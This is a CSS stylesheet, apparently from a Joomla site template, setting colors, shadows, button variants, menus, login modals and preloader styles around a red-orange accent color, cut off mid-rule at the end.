.white_bckg-60 {
  background-color: rgba(255,255,255,0.6);
}
.white_bckg-50 {
  background-color: rgba(255,255,255,0.5);
}
.white_bckg-40 {
  background-color: rgba(255,255,255,0.4);
}
.white_bckg-30 {
  background-color: rgba(255,255,255,0.3);
}
.white_bckg-20 {
  background-color: rgba(255,255,255,0.2);
}
.white_bckg-10 {
  background-color: rgba(255,255,255,0.1);
}
.black-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.5);
}
.black-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.4);
}
.black-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.3);
}
.black-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.2);
}
.black-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.1);
}
.white-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.5);
}
.white-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.4);
}
.white-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.3);
}
.white-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.2);
}
.white-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.1);
}
.major_color {
  color: #f14833 !important;
}
.white_color {
  color: #fff;
}
.text_color {
  color: #000000;
}
.major_color-lighten-10 {
  color: #f47363;
}
.major_color-lighten-20 {
  color: #f89e92;
}
.major_color-lighten-30 {
  color: #fbc8c2;
}
.gray-shadow-50 {
  box-shadow: 0 0 50px rgba(85,85,85,0.5);
}
.gray-shadow-40 {
  box-shadow: 0 0 40px rgba(128,128,128,0.4);
}
.gray-shadow-30 {
  box-shadow: 0 0 30px rgba(128,128,128,0.3);
}
.gray-shadow-20 {
  box-shadow: 0 0 20px rgba(128,128,128,0.3);
}
.gray-shadow-10 {
  box-shadow: 0 0 10px rgba(128,128,128,0.3);
}
.transparent {
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent li.active a {
  color: #f14833;
  border-bottom: 2px solid #f14833;
}
#sp-header.onepage .sp-megamenu-parent li.active:first-child >a.page-scroll {
  color: #f14833;
  border-bottom: 2px solid #f14833;
}
#sp-header.onepage .sp-megamenu-parent ul li a {
  border-bottom-width: 0px !important;
  border-right: 2px solid transparent;
  border-radius: 0 !important;
}
#sp-header.onepage .sp-megamenu-parent ul li a:hover {
  color: #f14833;
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent ul li.active a {
  border-right: 2px solid #f14833;
}
#sp-header #sp-menu .sp-megamenu-parent >li.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent >li.sp-has-child.active>a {
  color: #f47363;
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active:hover>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item a:hover {
  color: #fff;
  background-color: #f14833;
  background-color: rgba(241,72,51,0.8);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a:hover {
  background: transparent !important;
  border-bottom: 1px solid rgba(0,0,0,0.15);
  box-shadow: 0 1px 0px rgba(250,250,250,0.15);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a:hover {
  background: transparent;
}
#sp-header .top-search-wrapper .searchwrapper {
  box-shadow: 0 0 0 6px rgba(241,72,51,0.5);
}
#sp-header #cart-menu {
  padding: 0;
}
#sp-header #cart-menu #cd-menu-trigger .empty_basket,
#sp-header #cart-menu #cd-menu-trigger .items-added,
#sp-header #cart-menu .cd-cart .empty_basket,
#sp-header #cart-menu .cd-cart .items-added {
  background-color: #f14833;
}
#sp-header #cart-menu #cd-menu-trigger.menu-is-open >i,
#sp-header #cart-menu .cd-cart.menu-is-open >i {
  font-size: 30px;
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger >i,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart >i {
  background-color: rgba(51,51,51,0.75);
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger.menu-is-open .total_products,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart.menu-is-open .total_products {
  -webkit-transition: all .4s ease;
  -moz-transition: all .4s ease;
  -o-transition: all .4s ease;
  transition: all .4s ease;
  right: 27px;
  font-size: 11px;
  line-height: 18px;
  height: 18px;
  width: 18px;
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner {
  background: rgba(241,72,51,0.85);
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item.current-item>a,
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item a:hover {
  background-color: #b21f0c;
  background-color: rgba(0,0,0,0.25);
}
.overflow-hidden {
  overflow-x: hidden;
}
.sp-module ul.accordion-menu > li .offcanvas-menu-toggler .close-icon {
  color: #f14833;
}
.sp-module ul.accordion-menu li.current > a {
  color: #f14833;
}
.nav.menu li.current > a {
  color: #f14833;
}
.close-offcanvas:hover {
  border: 1px solid #f14833;
  color: #f14833;
}
.full-screen .offcanvas-menu,
.full-screen-off-canvas-ftop .offcanvas-menu {
  margin-bottom: 10vh;
}
.full-screen .offcanvas-menu .search input,
.full-screen-off-canvas-ftop .offcanvas-menu .search input {
  height: 44px;
}
.full-screen .offcanvas-menu .flex-search:before,
.full-screen-off-canvas-ftop .offcanvas-menu .flex-search:before {
  line-height: 44px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler {
  padding: 5px 15px;
  line-height: 18px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon {
  font-size: 16px;
}
.slide-top-menu .offcanvas-menu {
  margin-bottom: 10vh;
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.slide-top-menu .offcanvas-menu .separator,
.slide-top-menu .offcanvas-menu .nav-header {
  color: #b3b3b3;
}
.new-look .offcanvas-menu {
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.new-look .offcanvas-menu .sp-module ul >li .separator,
.new-look .offcanvas-menu .sp-module ul >li .nav-header {
  color: #999999;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:before {
  background: #f14833 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:after {
  background: #f14833 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:before {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:after {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:before {
  background: #f14833 none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:after {
  background: #f14833 none repeat scroll 0 0;
}
a {
  color: #f14833;
}
a:hover {
  color: #e2270f;
}
.article-info >dt >i,
.article-info >dt >span.fa,
.article-info >dt >span.fas,
.article-info >dd >i,
.article-info >dd >span.fa,
.article-info >dd >span.fas {
  color: #f47363;
}
.article-info >dt .voting-symbol span.star,
.article-info >dd .voting-symbol span.star {
  color: #f47363;
}
.article-info >dt .sp-rating span.star:hover:before,
.article-info >dt .sp-rating span.star:hover ~ span.star:before,
.article-info >dd .sp-rating span.star:hover:before,
.article-info >dd .sp-rating span.star:hover ~ span.star:before {
  color: #ef331b;
}
.article-info >dt .ajax-loader:before,
.article-info >dd .ajax-loader:before {
  color: #e2270f;
}
#offcanvas-toggler >i {
  color: #f47363;
}
#offcanvas-toggler >i:hover {
  color: #f14833;
}
.sp-pre-loader {
  background: rgba(255,255,255,0.8);
}
.sp-pre-loader .sp-loader-clock {
  border: 3px solid #333333;
}
.sp-pre-loader .sp-loader-clock:after {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-clock:before {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-circle {
  border: 4px solid rgba(51,51,51,0.4);
}
.sp-pre-loader .sp-loader-circle:after {
  border-top-color: #333333;
}
.sp-pre-loader .loader-flip:after {
  background-color: rgba(51,51,51,0.8);
}
.sp-pre-loader .sp-loader-bubble-loop {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-bubble-loop:before {
  background-color: rgba(51,51,51,0.5);
}
.sp-pre-loader .sp-loader-bubble-loop:after {
  background-color: rgba(51,51,51,0.5);
}
.sp-pre-loader .circle-two > span,
.sp-pre-loader .circle-two > span:before,
.sp-pre-loader .circle-two > span:after {
  border: 2px solid #333333;
}
.sp-pre-loader .wave-two li {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-audio-wave {
  background: linear-gradient(#333333,#333333) 0 50%, linear-gradient(#333333,#333333) 0.625em 50%, linear-gradient(#333333,#333333) 1.25em 50%, linear-gradient(#333333,#333333) 1.875em 50%, linear-gradient(#333333,#333333) 2.5em 50%;
}
.sp-pre-loader .sp-loader-with-logo .line {
  background: #333333;
}
.btn-primary,
.button,
.btn-readmore,
.sppb-btn-primary,
.vm-button-correct {
  border-color: #f03f29;
  background-color: #f14833;
  background-color: rgba(241,72,51,0.9);
  color: #fff;
  outline: 0;
}
.btn-primary:hover,
.btn-primary:focus,
.button:hover,
.button:focus,
.btn-readmore:hover,
.btn-readmore:focus,
.sppb-btn-primary:hover,
.sppb-btn-primary:focus,
.vm-button-correct:hover,
.vm-button-correct:focus {
  border-color: #ca230e;
  background-color: #f03720;
  color: #fff;
}
.btn-primary.sppb-btn-outline,
.button.sppb-btn-outline,
.btn-readmore.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-outline,
.vm-button-correct.sppb-btn-outline {
  border: 2px solid #f14833;
  color: inherit;
  background-color: transparent;
}
.btn-primary.sppb-btn-round.focus,
.btn-primary.sppb-btn-round.active,
.btn-primary.sppb-btn-round:focus,
.btn-primary.sppb-btn-round:active,
.btn-primary.sppb-btn-outline:hover,
.btn-primary.sppb-btn-outline.focus,
.btn-primary.sppb-btn-outline.active,
.btn-primary.sppb-btn-outline:focus,
.btn-primary.sppb-btn-outline:active,
.btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.button.sppb-btn-round.focus,
.button.sppb-btn-round.active,
.button.sppb-btn-round:focus,
.button.sppb-btn-round:active,
.button.sppb-btn-outline:hover,
.button.sppb-btn-outline.focus,
.button.sppb-btn-outline.active,
.button.sppb-btn-outline:focus,
.button.sppb-btn-outline:active,
.button.open > .dropdown-toggle.sppb-btn-outline,
.btn-readmore.sppb-btn-round.focus,
.btn-readmore.sppb-btn-round.active,
.btn-readmore.sppb-btn-round:focus,
.btn-readmore.sppb-btn-round:active,
.btn-readmore.sppb-btn-outline:hover,
.btn-readmore.sppb-btn-outline.focus,
.btn-readmore.sppb-btn-outline.active,
.btn-readmore.sppb-btn-outline:focus,
.btn-readmore.sppb-btn-outline:active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-round.focus,
.sppb-btn-primary.sppb-btn-round.active,
.sppb-btn-primary.sppb-btn-round:focus,
.sppb-btn-primary.sppb-btn-round:active,
.sppb-btn-primary.sppb-btn-outline:hover,
.sppb-btn-primary.sppb-btn-outline.focus,
.sppb-btn-primary.sppb-btn-outline.active,
.sppb-btn-primary.sppb-btn-outline:focus,
.sppb-btn-primary.sppb-btn-outline:active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.vm-button-correct.sppb-btn-round.focus,
.vm-button-correct.sppb-btn-round.active,
.vm-button-correct.sppb-btn-round:focus,
.vm-button-correct.sppb-btn-round:active,
.vm-button-correct.sppb-btn-outline:hover,
.vm-button-correct.sppb-btn-outline.focus,
.vm-button-correct.sppb-btn-outline.active,
.vm-button-correct.sppb-btn-outline:focus,
.vm-button-correct.sppb-btn-outline:active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-outline {
  background-color: rgba(241,72,51,0.9) !important;
  border-color: rgba(0,0,0,0.2) !important;
  color: #fff;
  outline: 0;
}
.btn-primary.sppb-btn-3d,
.button.sppb-btn-3d,
.btn-readmore.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d {
  border-bottom-color: rgba(0,0,0,0.25);
}
.btn-primary.sppb-btn-3d:hover,
.btn-primary.sppb-btn-3d:focus,
.button.sppb-btn-3d:hover,
.button.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d:hover,
.btn-readmore.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d:hover,
.sppb-btn-primary.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d:hover,
.vm-button-correct.sppb-btn-3d:focus {
  background: rgba(241,72,51,0.95);
  border-bottom-color: rgba(0,0,0,0.3);
}
.btn-primary.sppb-btn-3d:focus,
.btn-primary.sppb-btn-3d.focus,
.btn-primary.sppb-btn-3d:active,
.btn-primary.sppb-btn-3d.active,
.btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.button.sppb-btn-3d:focus,
.button.sppb-btn-3d.focus,
.button.sppb-btn-3d:active,
.button.sppb-btn-3d.active,
.button.open > .dropdown-toggle.sppb-btn-3d,
.btn-readmore.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d.focus,
.btn-readmore.sppb-btn-3d:active,
.btn-readmore.sppb-btn-3d.active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d.focus,
.sppb-btn-primary.sppb-btn-3d:active,
.sppb-btn-primary.sppb-btn-3d.active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d.focus,
.vm-button-correct.sppb-btn-3d:active,
.vm-button-correct.sppb-btn-3d.active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-3d {
  background: #f35d4b;
}
.sppb-btn-default,
.btn.sppb-btn-default {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.sppb-btn-default:hover,
.sppb-btn-default:focus,
.btn.sppb-btn-default:hover,
.btn.sppb-btn-default:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #f14833;
  color: #f14833;
}
.sppb-btn-default.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline {
  border: 2px solid #666666;
  color: inherit;
  background-color: transparent;
}
.sppb-btn-default.sppb-btn-outline:hover,
.sppb-btn-default.sppb-btn-outline.focus,
.sppb-btn-default.sppb-btn-outline.active,
.sppb-btn-default.sppb-btn-outline:focus,
.sppb-btn-default.sppb-btn-outline:active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline:hover,
.btn.sppb-btn-default.sppb-btn-outline.focus,
.btn.sppb-btn-default.sppb-btn-outline.active,
.btn.sppb-btn-default.sppb-btn-outline:focus,
.btn.sppb-btn-default.sppb-btn-outline:active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline {
  background-color: transparent !important;
  color: #e2270f;
  border: 2px solid #f14833 !important;
  box-shadow: none;
}
.sppb-btn-default.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d {
  border-bottom-color: #666666;
}
.sppb-btn-default.sppb-btn-3d:hover,
.sppb-btn-default.sppb-btn-3d:focus,
.btn.sppb-btn-default.sppb-btn-3d:hover,
.btn.sppb-btn-default.sppb-btn-3d:focus {
  background-color: transparent;
  color: #e2270f;
  border-bottom-color: #f14833;
}
.sppb-btn-default.sppb-btn-3d:active,
.sppb-btn-default.sppb-btn-3d.active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d:active,
.btn.sppb-btn-default.sppb-btn-3d.active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom: 2px solid #f14833;
  background-color: transparent;
}
.btn-link,
.sppb-btn-link {
  color: #f47363;
}
.btn-link:hover,
.btn-link:focus,
.sppb-btn-link:hover,
.sppb-btn-link:focus {
  color: #f14833;
  text-decoration: none;
}
.btn-readmore {
  color: #fff;
}
.btn-readmore:hover,
.btn-readmore:focus {
  color: #fff;
}
.btn-dark,
.sppb-btn-dark {
  color: #fff;
  border-color: #4d4d4d;
  background-color: rgba(51,51,51,0.72);
}
.btn-dark:hover,
.btn-dark:focus,
.sppb-btn-dark:hover,
.sppb-btn-dark:focus {
  color: #eee;
  border-color: #333;
  background-color: #424242;
  background-color: rgba(51,51,51,0.87);
}
.btn-dark.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline {
  border-color: #333;
}
.btn-dark.sppb-btn-outline:hover,
.btn-dark.sppb-btn-outline.focus,
.btn-dark.sppb-btn-outline.active,
.btn-dark.sppb-btn-outline:focus,
.btn-dark.sppb-btn-outline:active,
.btn-dark.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline:hover,
.sppb-btn-dark.sppb-btn-outline.focus,
.sppb-btn-dark.sppb-btn-outline.active,
.sppb-btn-dark.sppb-btn-outline:focus,
.sppb-btn-dark.sppb-btn-outline:active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-outline {
  color: #eee;
  border-color: #333;
  background-color: #535353;
  background-color: rgba(51,51,51,0.8);
}
.btn-dark.sppb-btn-3d,
.btn-dark.sppb-btn-3d:hover,
.btn-dark.sppb-btn-3d.focus,
.btn-dark.sppb-btn-3d:focus,
.btn-dark.sppb-btn-3d:active,
.btn-dark.sppb-btn-3d.active,
.btn-dark.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d:hover,
.sppb-btn-dark.sppb-btn-3d.focus,
.sppb-btn-dark.sppb-btn-3d:focus,
.sppb-btn-dark.sppb-btn-3d:active,
.sppb-btn-dark.sppb-btn-3d.active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #262626;
}
.btn-light,
.sppb-btn-light {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
  background-color: rgba(255,255,255,0.05);
}
.btn-light:hover,
.btn-light:focus,
.sppb-btn-light:hover,
.sppb-btn-light:focus {
  border-color: #fff;
  color: #fff;
  background-color: rgba(255,255,255,0.15);
}
.btn-light.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-outline:hover,
.btn-light.sppb-btn-outline.focus,
.btn-light.sppb-btn-outline:focus,
.btn-light.sppb-btn-outline:active,
.btn-light.sppb-btn-outline.active,
.btn-light.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline:hover,
.sppb-btn-light.sppb-btn-outline.focus,
.sppb-btn-light.sppb-btn-outline:focus,
.sppb-btn-light.sppb-btn-outline:active,
.sppb-btn-light.sppb-btn-outline.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #fff;
  color: #fff;
}
.btn-light.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d {
  border-bottom-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-3d:hover,
.btn-light.sppb-btn-3d.focus,
.btn-light.sppb-btn-3d:focus,
.btn-light.sppb-btn-3d:active,
.btn-light.sppb-btn-3d.active,
.btn-light.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d:hover,
.sppb-btn-light.sppb-btn-3d.focus,
.sppb-btn-light.sppb-btn-3d:focus,
.sppb-btn-light.sppb-btn-3d:active,
.sppb-btn-light.sppb-btn-3d.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #fff;
}
.btn-flex,
.sppb-btn-flex {
  color: #fff;
  border-color: #f89e92;
  background-color: rgba(255,255,255,0.25);
  box-shadow: 0 2px 5px rgba(0,0,0,0.15);
}
.btn-flex:hover,
.btn-flex:focus,
.sppb-btn-flex:hover,
.sppb-btn-flex:focus {
  border-color: #f6887b;
  color: #fff;
  background-color: rgba(241,72,51,0.7);
}
.btn-flex.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline {
  color: #fff;
  border-color: #f89e92;
  background-color: rgba(255,255,255,0.25);
}
.btn-flex.sppb-btn-outline:hover,
.btn-flex.sppb-btn-outline.focus,
.btn-flex.sppb-btn-outline:focus,
.btn-flex.sppb-btn-outline:active,
.btn-flex.sppb-btn-outline.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline:hover,
.sppb-btn-flex.sppb-btn-outline.focus,
.sppb-btn-flex.sppb-btn-outline:focus,
.sppb-btn-flex.sppb-btn-outline:active,
.sppb-btn-flex.sppb-btn-outline.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #f6887b;
  color: #fff;
  background-color: rgba(241,72,51,0.7);
}
.btn-flex.sppb-btn-3d,
.btn-flex.sppb-btn-3d:hover,
.btn-flex.sppb-btn-3d.focus,
.btn-flex.sppb-btn-3d:focus,
.btn-flex.sppb-btn-3d:active,
.btn-flex.sppb-btn-3d.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d:hover,
.sppb-btn-flex.sppb-btn-3d.focus,
.sppb-btn-flex.sppb-btn-3d:focus,
.sppb-btn-flex.sppb-btn-3d:active,
.sppb-btn-flex.sppb-btn-3d.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #f47363;
}
.light >i {
  color: #f9b3aa;
}
.light:hover i {
  color: #fbc8c2;
}
ul.social-icons >li a:hover,
ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #fbc8c2;
}
.login .title i.pe,
.registration .title i.pe {
  color: #f89e92;
}
.ap-login a i.pe,
.ap-signin a i.pe {
  color: #f89e92;
}
.ap-modal-login .modal-dialog {
  color: #000000;
}
.ap-modal-login .title i.pe {
  color: #f89e92;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a {
  color: #000000 !important;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a:hover {
  color: #f14833 !important;
}
.ap-modal-login .modal-content .modal-footer a:hover {
  color: #f14833 !important;
}
.view-profile .select-menu select {
  display: block;
}
.view-profile button:focus {
  outline: none;
}
.view-profile a[title="Cancel"] {
  background-color: #888888;
  color: #fff;
}
.view-profile a[title="Cancel"]:hover {
  background-color: #6f6f6f;
}
.ap-my-account-menu .signin-img-wrap i.pe {
  color: #fbc8c2;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a {
  color: #000000 !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover {
  background-color: rgba(241,72,51,0.8);
  color: #fff !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover::before {
  color: #fbc8c2;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a {
  color: #f14833;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover {
  background-color: rgba(241,72,51,0.8);
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover i {
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a i {
  color: #f14833;
}
.ap-my-account-menu .dropdown-menu ul.menu >li.active > a {
  background-color: rgba(241,72,51,0.8);
  color: #fff !important;
}
.login-wrapper >i.pe,
.registration-wrapper >i.pe,
.reset-wrapper >i.pe,
.remind-wrapper >i.pe {
  color: rgba(241,72,51,0.07);
}
.login-wrapper >i.pe {
  color: rgba(85,85,85,0.02);
}
#sp-top-bar ul.social-icons >li a:hover,
#sp-top-bar ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #f35d4b;
}
#sp-top-bar.onepage {
  box-shadow: inset 0 1px 0px rgba(0,0,0,0.05), inset 0 -1px 0px rgba(0,0,0,0.1);
}
#sp-top-bar.onepage .sp-contact-info li i {
  color: #d8250f;
}
#sp-top-bar.onepage .ap-login a i.pe,
#sp-top-bar.onepage .ap-signin a i.pe {
  color: #d8250f;
}
.sp-contact-info li a:hover {
  color: #f6887b;
}
.sp-contact-info li i {
  color: #f6887b;
}
.sp-module-content .mod-languages ul.lang-block li.lang-active a i {
  color: #f89e92;
}
ol.breadcrumb li a:hover {
  color: #f9b3aa;
}
.sp-module ul >li >a,
.sppb-addon-module ul >li >a {
  color: #1a1a1a;
}
.sp-module ul >li >a:hover,
.sppb-addon-module ul >li >a:hover {
  color: #f14833;
}
.sp-module.white .sppb-addon-content ol >span,
.sppb-addon-module.white .sppb-addon-content ol >span {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li,
.sppb-addon-module.white .sppb-addon-content ol li {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li a,
.sppb-addon-module.white .sppb-addon-content ol li a {
  color: #fff;
}
.sp-module.white .sppb-addon-content ol li a:hover,
.sppb-addon-module.white .sppb-addon-content ol li a:hover {
  color: #f9b3aa;
}
.sp-module.dark ul >li >span >a,
.sppb-addon-module.dark ul >li >span >a {
  color: #f35d4b;
}
.sp-module.dark ul >li >span >a:hover,
.sppb-addon-module.dark ul >li >span >a:hover {
  color: #f89e92;
}
.sp-module.dark ul >li >a,
.sppb-addon-module.dark ul >li >a {
  color: #f47363 !important;
}
.sp-module.dark ul >li >a:hover,
.sppb-addon-module.dark ul >li >a:hover {
  color: #f9b3aa !important;
}
.sp-module .latestnews >div >a,
.sppb-addon-module .latestnews >div >a {
  color: #000000;
}
.sp-module .latestnews >div >a:hover,
.sppb-addon-module .latestnews >div >a:hover {
  color: #f14833;
}
.sp-module ul.category-module >li >a,
.sp-module .relateditems >li >a,
.sppb-addon-module ul.category-module >li >a,
.sppb-addon-module .relateditems >li >a {
  color: #f47363;
}
.sp-module ul.category-module >li >a >div.related-date,
.sp-module .relateditems >li >a >div.related-date,
.sppb-addon-module ul.category-module >li >a >div.related-date,
.sppb-addon-module .relateditems >li >a >div.related-date {
  color: #999999;
}
.sp-module ul.category-module >li >a >div.related-date >i,
.sp-module .relateditems >li >a >div.related-date >i,
.sppb-addon-module ul.category-module >li >a >div.related-date >i,
.sppb-addon-module .relateditems >li >a >div.related-date >i {
  color: #f89e92;
}
.sp-module ul.category-module >li span,
.sp-module ul.category-module >li p,
.sp-module .relateditems >li span,
.sp-module .relateditems >li p,
.sppb-addon-module ul.category-module >li span,
.sppb-addon-module ul.category-module >li p,
.sppb-addon-module .relateditems >li span,
.sppb-addon-module .relateditems >li p {
  color: #999999;
}
.sp-module ul.category-module >li span >i,
.sp-module ul.category-module >li p >i,
.sp-module .relateditems >li span >i,
.sp-module .relateditems >li p >i,
.sppb-addon-module ul.category-module >li span >i,
.sppb-addon-module ul.category-module >li p >i,
.sppb-addon-module .relateditems >li span >i,
.sppb-addon-module .relateditems >li p >i {
  color: #f89e92;
}
.sp-module ul.category-module >li a.mod-articles-category-title,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title {
  color: #000000;
}
.sp-module ul.category-module >li a.mod-articles-category-title:hover,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title:hover {
  color: #f14833;
}
.sp-module .tagscloud .tag-name,
.sppb-addon-module .tagscloud .tag-name {
  color: #666666;
}
.sp-module .tagscloud .tag-name:hover,
.sppb-addon-module .tagscloud .tag-name:hover {
  background: #f35d4b;
  border-color: #f14833;
  color: #fff;
}
.tag-category ul.category li h3 >a {
  color: #595959;
}
.tag-category ul.category li h3 >a:hover {
  color: #f14833;
}
.tags a.label {
  background-color: rgba(45,45,45,0.45);
}
.tags a.label:hover {
  background: #f35d4b;
}
.tags >span >i {
  color: #c4c4c4;
}
.tags:hover >span >i {
  color: #919191;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a {
  color: #1a1a1a;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a:hover {
  color: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a {
  color: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a:hover {
  color: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li span.simple-divider {
  color: #fcdeda;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a {
  background: #f14833;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover,
